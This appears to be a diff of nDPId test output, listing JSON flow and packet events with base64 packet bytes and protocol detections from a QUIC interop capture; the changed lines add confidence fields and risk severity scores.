 01180{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1603816434629,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"ts_msec":1603816434629,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJAgVoAADQBpNWDnxjGwKgBgAMDhTkAAAAARQAFAE67QAA0EZSkwKgBgIOfGMaicxFRBOyPwMEKCgoKCAqQphKlf+flAABE0q1MzAF7B\/pTV0kG5xawMpe3HkhLaz5LmMUUyw3WhYoi5nbpPV7NpV4GM27AXpOgHO\/SzLtIdktFTC4TCKMp7m9qMnCbweSvMGChHkpC5U7w60\/uPzwGl47ucIe9rYiZgKyYjN+8oftGbKB4AlEqhdFs2MoFYovXtoKkQBN7VSB0IxvuY2TC3GidshXx3wTMXfzuo1\/6i1KLTmmNbxSq1CGPdP1PQ24uDLBbi+meANNn06rbl+K9tUdkmsxH+USREu4XCkprwqJDGZjipci4pVwimHHp5mYTfFDWt8XxRCHJmOScE5wt7DLDqP6wUv\/R9RjuGRN\/nD4BOc5F4KnrlgXBSjWA8uw\/1hUs9cHVpYBS0ltoa5wxXIx++EBaRxTWEi36GVZ65l2iVnWKkd\/xq7p88n0OTSzw9MX6zL1vpn8Q3b5hVpTOfk0XSi5xbalOfjBvaK425FOHISkLRT4hHBTrZPDUxwxwBg08G2H36nvO3sZ2DqZCH92UgDfl3OrnJTQ5kZer0RXiGe8JxWv76LxDqR1kJ0SXR282tjRVBUWk2yeunxwz3vNCj4omHVmk44mRi251cY+XJzT44HEva4iNMf74w7Rm7ot9s3dpNfVwJPF0r16L56vzdWhG5cGOJ1D+VSlbkJMR4r0BQwF2\/eCtSeTN+rk="}
-00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434629,"flow_last_seen":1603816434629,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816434629,"l3_proto":"ip4","src_ip":"131.159.24.198","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.619289}
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434629,"flow_last_seen":1603816434629,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816434629,"l3_proto":"ip4","src_ip":"131.159.24.198","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.619289}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434640,"flow_last_seen":1603816434640,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434640,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":45250,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02140{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1603816434640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434640,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAXZdAAEAReS3AqAGAM55pYrDCEVEE7CF4zAoKCgoI\/WffY03wSeUAAETSMHofJsIVRtpuQGVddBW97CfvMNh6FstJkOMpUt\/yyfMol2NH\/cmw9076\/GVp8Jiw6RRO55nAlaDXRKDx+fRRFB3MWLmB\/9BdlA7rKSF+bxrlmvb7IG3rx2evLnOEA295WB7h7yye\/Yb8SM1ckobonKrZZ3VSIcOyeDvx1To8yKU8S+qgO5UB6V6j3ZR4z8tia9hoRBaJuuWjnRXPIzRC\/Y4Ty4G0TTfbVLamm4ej+5tVGNr3TS7pN2Xzt9lr5OogvAmipVfcrFQmzNA\/+bixOvtJICDh3fR9sII+Aa6F3m95yiDF8HdhXx8TxWV640MZkTOca5MbcwS+YPz+INAIjF0s2owurg4clHkrQ\/h1vY9wfL8cau+doFTFKxQWkVu3t2i\/+mAsWEv1COMBJgtwWY\/1oMYnha9PWceb7bjtXvQ0AFrjBC2iUpE8uKG2lpMj3vw++EDHs4D8UOswAsYKSR3QKTNy5\/n9F2K6wbOe4lbPp1tEUC9i4BjrP65N5Jjd4whCLlWExxdcuUiqmeRWX1rLfPxynJrkw7vqaREC00sCdzi7Lh2rgh1ZgrEUMSznXgMtkuiWXjnmdl6yNUvpIov2oxF5IIqE7+inmRUO\/4bFKluz0rJxSvweOGUOG06qc89\/fVfEYvQVfSGie\/2jaZPAoa73lw60ChYZL5W8YQTUE+iYwCEs\/LrU43Io05inp4fW99XL+dqJLeBaKkadyRCr+ZlWnxdK3SIVAKssrqk8c+dwBP8Ga9TvI0fwtqyE9zLeGdLLth+UrgzbKZkjPtZvumQptE3y8vzXm3rNGckk+s+tH5kfuTErhMMgcEqqghapUSbghSKFnvd8KXrp5I5dImNV23VsAFnZphiNdSMrAO\/5tN9cHTB5kZFEzKzu5mIwtp39YSpIVho1618W4woojYayBTAYGdCFJnsdHAOWZ0YNc9fXqn3t7pH0RfvXqhkQ14VLJ65JuJqy\/Qz9StzBGBZch\/xsRQnL8tGwRc9QlrXGc3QWq7muqAOCyzpHoMChq2oTRE\/8HPgudmPNkrAf\/ScwBASioyMRhmPXbQOnz8kpZqhiLFLzbv+SqaBxgR+bgVYn1+3zxEWz0OQ7t81FdQLiQ\/r7o1w\/5GTxaT2UQy4+HSu3XgrEmc70xQDowI3TS6l1xbMtq6G0wpiqDxghwCsLBT2Jp0llaTYvV20z5T8ax80YSjv99Judp7QAD+5ZWDqxTHKL7rG3JmR6R8uIhzq4m21IYTygNOeNDTZrVPa3NY1BluNOiJM0ojQMwAtKPXhJSECktSWYBn4OIxP0YP6tXleYVmyb\/7bsrgrloCmarQYyCzGzZUopQB5p32ofLV7NTKVj48TfiOfWu7G7+u2kMk6czrGQwjYr399xRe06yg2sy+HVyEgd6XGMtNrXxL3I24LS63NRpc2fVvxrjZFP5bKendh2XIq59I5JF37M+rn6izwnuj0OrSHOnrx4VNLacB+DNwcXJTwF6fVCp5WfoIclvXXgD5bQwPAiNcduRQACIAJ6RQmeAmxrOjgDcNXfvMKHilUpISNlFeHOjhQMA+MiaVzNspXJLCod8B953YO\/H92LBu4hBpcVIl5YP489aYAYtVAU\/QpiEmGNr0vZKsef4Zb9RxDNgQgxIA=="}
-00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434640,"flow_last_seen":1603816434640,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434640,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":45250,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.seemann.io","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434640,"flow_last_seen":1603816434640,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434640,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":45250,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.seemann.io","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434641,"flow_last_seen":1603816434641,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434641,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":42456,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1603816434641,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434641,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAJ7VAAEAR9yjAqAGAhfLO9KXYAbsE7ImgzgoKCgoI+QsGqtFYjA8AAETSVUSb8KmUst+PHHzqT2SeL\/P07nKCp3USUYX2DxY7ve1fmgM+d6G2XMZ3HCv4lyQmqoBHOLElyJxOdKbHXGRlPb8Uw+yalWHgIS2xYoZgj5sMn8MqFHMsZqNCggoXKshRMixX78IzGLR2\/lKiD1A4mWU8YHeWKPR7TnPFWL0DkYoQdkBU3xXWNJeqWETA9YozB6efhg2cH2ogJnonWpHROpBEB6lu\/jcG\/MvvNGSQjaR7z3v7jq8Mw3XxsqjwZfgpi304y1BIMudGRSpwPxm1jggsFOOXDIKWUaaGiA8X1EtpSPbruNIaK\/L8nYCzR9\/1l92Fw0JngzKyN6xNFLLYtOKoV1Pwa0efysfY2dAAzQNo7LPVtGghy0jghB\/MURPiryuRJr7wLMN4\/xkziyibDmu9JuazbAVT5UQo01\/BC8SQIa5x6yjASIJd2bcftTT20FM1jxDiA3ArSF1FxI0DGP+Jup6uykp66yBe41NxzaF3JQhi3TYG05c9pWzR4rpiqKPbw8ISxSbEYLfqoBX7ZUxcl+Qs7EKjfeI5rSefpJ79UTAq2IOiRgmJMMPilU+j\/185uZ3gWFqXxY4lgvGRDb5sAaglqlZSnbVW0el8W0GPbw+\/aZQWJkNyosBG0ozqSDnxIVCgg0DqM7BVwbstGqm3b9mynQaPfUAvtCmsTRJuCzcgqkIiUtIZwgZHsP4Be4bN3A3Q2DeS1HWXmwRv5KaOe44h9q+4TtSXNmmmmTGGXWu2YAX7Lgvd0URyUOZt4f1KhTFK\/k8sK43+MB6mD4td8sjJsQiy0V30FZY3CtSNXK7u4R6vEWsgJPI55D4UDnEYK2uN8lk+fDHWtQbSlQqu0U4znKSeK2EAX9xBVuEJeh5HeX4+cNWyIRDmAoYsQmQgmHBoD6pedxp9SXnK9s\/7uoVpaKxNV9ZM\/iWMB\/uKFhDd1+o1EWWjwuWds0vy+ZbywiOwrY6ffiSgerdtWkuaQf7H9QdZ0UjwbnJvPjya7DyyPtvP8PWp\/N1D867R\/QvkR8ZIaOdSzOuUYBF\/bpCqsIrnKeR9VUtP9FyxkgG\/D6+0uEUl1c779cxCQck2S\/t2diwFSth\/DmYwuknya3f6okawJcF12dISBsiADyiScw4IixWhDn\/\/uIv78yc9e+mYJhjZyPxGXEyGiSruZ8bPrtfTna0\/r1NWY3ZypYWBjkDiSvD3Zfa1+eJsREXjUDRwmFnIeE1AgD9eHr4oXUc9yJ0M0cy1rxfrdBrPiv\/e9MTJXnRIvBev2VujEE1pdbaj\/uNoH8Iud1E4wh4YfsafTjdd+pK20QBXt1fVDPye\/nA\/auW82P\/6KerEyR8YFb1Q5decEBub3RIeRj1Zngb5dOSVgZS4YCk2C7bsuJFE8JSiO5eFBdWQrY9tTmedksZFAA6HhJPngNaUeVLzpnQktjQ5caPa6W7\/wHdT3eGdJpDXMcegGharvIfBkRc9tQPIVXwcqIbyrB3nyDdj71w60xBtjcgnuLW+j+IpTtj+MDyKaFGpdmJ95nu62ZA4gWFibO+sNt5rW4Ayr9RTU1vnb545kUJfXX39XayUfvMOvDTraKzQ3G7U4a0GC+KFmI9u9t3VltkEq5ickl9h+mNSdzqETNFgrEr943KdW+amAA=="}
-00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434641,"flow_last_seen":1603816434641,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434641,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":42456,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h2o.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434641,"flow_last_seen":1603816434641,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434641,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":42456,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h2o.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434642,"flow_last_seen":1603816434642,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816434642,"l3_proto":"ip6","src_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
 02134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1603816434642,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434642,"pkt":"PKn0qB\/spJGxgjQ5ht1gBmesBNg6MCABSAB4FwEBvnZO\/\/4EYx0gAQsHCsnVrqTT\/kdpHoB9AQRbQQAAAABgAK6QBNgRMCABCwcKydWupNP+R2kegH0gAUgAeBcBAb52Tv\/+BGMdhooBuwTYZF3MCgoKCgiLyuadTBhpMAAARL5Jn8vg\/A\/iHcc5HGyjUHtzYCYh3M+1HzdHtSjFxotnADrnTs2cVW9HALnbbxq+j13Bpa3hTOGyFKAuVKKOVbHcGaJLdNA06DSFzV66GiVnWQJ+1MFEeQ+EHU1tYSy5DynacUlvf1G20dd2kmKE70+xxOTQI+IxdCf39TGHKu+pGUdVYYzStvwWo5npAklpjTRW1hPHPgr+vxfK0tzntAB4tgdSsfnM003avASiWDb+GIQGRqQqd12Z3S73M6xSxbEpPhQs03GVV7j7jPCY+xuSqdE0+RC2M2xTxkDxrKzwifOo5JzioGQ8n1leAaytkPPh7\/6kP3tXKc3zSh+6mDapIcrXvGRPBtxzjcwZlnfC61xJLZ4o\/bDf7VXUn2iqev2r7RfntxDJ4F+CHoqdQU19Agb1DRLZ+44sSsLJRZPe0rMYqmphZb9TR\/CXfZoxmWSMgVmNHVqPhkUDRkBFiFUg2qWtzD6IUIlCi4UB90+3QDAMKbHPStmRV90FoZ4qgb1QWQshIsAOJrfADpMoeQeOvpHnWSBMA4n5tbORKddl3SJHwqDMa\/kYlEza3HmYzKyIekgCLUxBLZMgtxwl0pUeJvIYxMdZF6Znn7pRsQ+GhZyet6ZCOM2ft7uJCMRH5bphpdavcWHTrSt8uZ2iyfo3VofxaZqdzUsHHTpc9bD205szhfCxENgNATF1PGuWlfKJUrPPjUWPpw65iGFR3+hPQ1+ZRRE7orDx2vkC5kOJiEvbv0d6sp6yfMo3tuOn4kXULD2rf5TSc8aqDVZCklaUIbEuKaQv0jni\/XkpmdOw2UlUp3oYLZ9on+kdq43Nf9WrEJ+gfSZPMUZsyhXXyPRNGMrTBo0SUX31QcOdzW7AQaAXnJRZob+0gus27voTqIEPJh01fxeGPbXNNQ7VzwarPIKHRq1lGIs\/wJwJCsm2hQjq0+K3VFq4cXacrOp5mbdbbDJRXEnCejUnTswq7Ga3dz818NNmVp7FoznVEcHX3RQBfk8eLveHtTEpxIgmvWuj5aaZt+HyxH\/0YALf+wz6lv1s1l\/hg9o2e11OlebH1k7T7awcxgi41AZepwsE50V3GVh5GwIfK89lz9Ro6tly3hUhrsJ2ja1C+A6RBrWVVdcIlZY4BlIcSzf0BUccadkfpP\/Enz0yFkuHTLXTyrmsvl44wgxOvsJrZMwFacqnccJZHwZHWEMkNcxcPbL0Z2U7a3Xa12dEVYYVu1U+X65oQyb2yPkBqMJ+DTB9RU+DnZIynnRzCZZkuvH7Uzn\/zVoVu3fNULVHSP4L+ehdOiOmS0l9r6IzvZQbe+xLjtz2iXbuU36zKNhA17n0gtw0JDOpoFDbD0FwhdY1JUMZx18mcrbFQX02CO02e+BE1Anxc\/TfBIKj2hI2ObT4d57WIvq7cpwJxNdZMuBfjVhAX64+5X4J\/pGNdD3WMTo1fYU74kzII9sWnijVE1WzVIBymOIxdGDOuxbCm5vJaE\/oIJEfaWcfmDwa+jhxCRN2aqJvKC+Iwq2cNN7z7vgOXAZ9SIrdZFgVX8+v9NO3ca9aZg=="}
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434642,"flow_last_seen":1603816434642,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816434642,"l3_proto":"ip6","src_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434642,"flow_last_seen":1603816434642,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816434642,"l3_proto":"ip6","src_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434643,"flow_last_seen":1603816434643,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434643,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":50289,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1603816434643,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434643,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAVf9AAEARrFLAqAGAR8opqcRxEVIE7K+PxgoKCgoIvbmHXcmpQ\/MAAETS3vbU8Sj6l2wQUfqZRc1xY7UZLfv8ZezreoQxaXMMFQplcHI2WGivL79HCn+gIsF8oZtTfotO31JT7vkJlhmOnm3lffZWDOZVO38TNr5VVART1r1V9c6QtCPl2rOLEXod3QmseC2zkUY1D5vxPNLpAyblFgLtoVLKMFRlexYKVyLMEaY69TsXwdxzuRMmPQ8UL6uRNnJiBB3upwv58iisAqq\/mRUYsFRLcP1OPYHQb5CZdE1Q\/A+91wfQFJGWqFUY9F+EFUVCV4bxdetx31E8OGGq+18vcHmg7G0LGgeINT+xkb92oyBcQkbST\/RWAy9hTbi4JTuezLjGIBdZzSMVzF4I6bcizx7siMmVUTnl3UmC\/rxQUcKk8XFu2YJs9y2Os4+WhVjMwJbIx\/bkcUSXo\/NnUnrT4jCwxD6nX7oTObYUuq8Cnz5uWFN6MRwb1OvukfRscRjrcumAQBklq8PagQJe6Oyy9xDjeo0pQi33fo\/c8Y2ccYq0oba\/ZjGmaTjWjw4fyRgR2xdNJWEfSX9rXqOdXmuGVEnT1hq2hHX+bWhy2QkCI7BHn0dcsep8lx89ym717WWE\/Xbpk0tFl\/pCnOGrBuniD5HFSZDdjSGLJoEXvoHbpOgi\/IJCVo50+AcmmA1BKQpFl8EapwyTEeKmc\/teOj7E7tI\/aOzLNeX8EUS3z24mYkZTFOR32Oujeu3clt1f1qtieJ4Tya9ptPHxYnje1QnGDP7dwz5gh676z5hDQGO4+4bo6ul6N0iIcXDo+Yt7zeunYaItRqPosZXZf2RDRVFhaPMyZpD37kbwM3I2xJNOsJXPxB4VObi0enWqgsSeRLY928BMaf67KliYniVAoxk2r104WSZUE7jxtTguYe4EME09Q5d6rrjnTfQPYIelchCLjz7IISF0G4QSth+iInqIg43sXwXNGEiA5n2ll+d4YEisZf5kJw7z7z4H8LHdJs0yPLtOkDemSyBDayKCguo3SC6thZsf4fL8MHcNaDnsBOQ3qsjckq3DPrhBaaQQ\/PnOQb0Pep8XXsjDPf1z6oYyQ5OmCTSiiICzO3jhCvp6VkuawZ63dTmMdwG07DNkuUzrCU1s3uXcU3hD432hU+A1bUo4tC\/eVs7\/Cg1UBIH4KQAD55x1zc1rsEiqb1C7faMv3OYy2TY2rHCzIrLKBxU59Q7kRtUbmutTo74p7kwrrlSTJCO1YNPtU6XBWtj7wzz81NndAWB6N0QAk8std4i2V6WuY2cGSRu66EYGTh\/8K91k4tTDBWpfGf4TNDSp5t5T0dGpvXA5zPG8DWjbXuVi7ELoqM51NEc8d7+IK2OCAdmYpX1PsoZL0Lbaw475Ho+KFWuruhhhwa7wzva4K3thZxpZy0eBP044yQ0lANRgJ3bThJg8RPAeJgPvuqFcX20la91uDGheq8GjpqmA35Zc3CODLtZQpRoUd6coXnW9stWjWC7LAp2e921jv6NfJLWpnOIL3\/YvqFROrdJzbLYKnKNfCTryzQPuJNK60hRlQe0ccZ844JLUpRAYdtGzZkFKHhFRXy6oBkYx1M3HW\/UE2PcwS\/IjPcNZbTy+fdv2atp2T3sGZ4LPZca6tbu49as0q5fcEgS\/u25\/J8syzbevr8VL71PTWp8v54ud1Q=="}
-00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434643,"flow_last_seen":1603816434643,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434643,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":50289,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"71.202.41.169","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00997{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434643,"flow_last_seen":1603816434643,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434643,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":50289,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"71.202.41.169","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434643,"flow_last_seen":1603816434643,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434643,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":49270,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1603816434643,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434643,"pkt":"pJGxgjQ5PKn0qB\/sht1gDhbcBNgRQCABCwcKydWupNP+R2kegH0gAQvIR6QcJQAAAAAAAAABwHYRUgTYy97JCgoKCgizoUNUPmNvHgAARL7kE1\/vTL\/NMlU9dFfohroNb3lFa0sajkl+NYJsmpdZxseLTol2hdZqlkF1hqB0ifjTUijhcAiX+sblrKEYN3cCa28xTnru44DNDzMC4mlv4HrZOqLLNO\/UlY1sQ8NKCbNtoSq21p7clWer16m4TAw7H\/F9E3AX\/MdNlxeqaKJvymPkTEmiXkH2WePQ14zEX\/OsIv\/9nK